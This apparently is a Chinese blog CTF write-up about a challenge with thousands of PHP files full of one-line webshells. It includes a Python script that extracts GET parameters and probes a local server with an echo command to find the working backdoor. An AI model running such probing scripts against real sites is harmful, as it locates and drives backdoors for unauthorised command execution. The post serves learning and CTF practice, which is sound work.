目录
考点:本题目考查的是编写脚本的能力,从中学到了许多。

解题过程
打开题目后,是这样的,显示网站被黑,但是说明了源码的位置

访问/www.tar.gz ,发现这个源码有近40MB!!! 没办法,下载吧。
下载之后,发现里面有3002个项目,只有一个是index.html,其余都是php文件。并且每个php文件都有若干个一句话木马,这个不可能一个一个试,只能通过脚本来寻找。
我的学习过程是循序渐进的,通过学习师傅们的wp,从简单脚本写起。
1. 一个简单的exp
实现获取目标目录下php文件的get参数,并且尝试执行命令。(因为是练习,我只将目标php文件和一些其他php文件放进文件夹测试,不是全部的)
import re
import os
import requests
files = os.listdir('D:/phpstudy_pro/WWW/test1/') #获取路径下的所有文件
reg = re.compile(r'(?<=_GET\[\').*(?=\'\])') #设置正则
for i in files: #从第一个文件开始
url = "http://127.0.0.1/test1/" + i
f = open("D:/phpstudy_pro/WWW/test1/"+i) #打开这个文件
data = f.read() #读取文件内容
f.close() #关闭文件
result = reg.findall(data) #从文件中找到GET请求
for j in result: #从第一个GET参数开始
payload = url + "?" + j + "=echo ******" ##尝试请求次路径,并执行命令
#print(payload)
html = requests.get(payload)
if "******" in html.text:
print(payload)
exit(1)
代码执行结果:
![]()

这篇博客分享了解决网站被黑问题的过程,通过Python脚本自动化寻找PHP文件中的一句话木马。作者从简单脚本开始,逐步学习并实现了多线程版本的检测脚本,最终成功定位到可利用的文件和参数,展示了良好的脚本编写能力和问题解决思路。

5986

被折叠的 条评论
为什么被折叠?



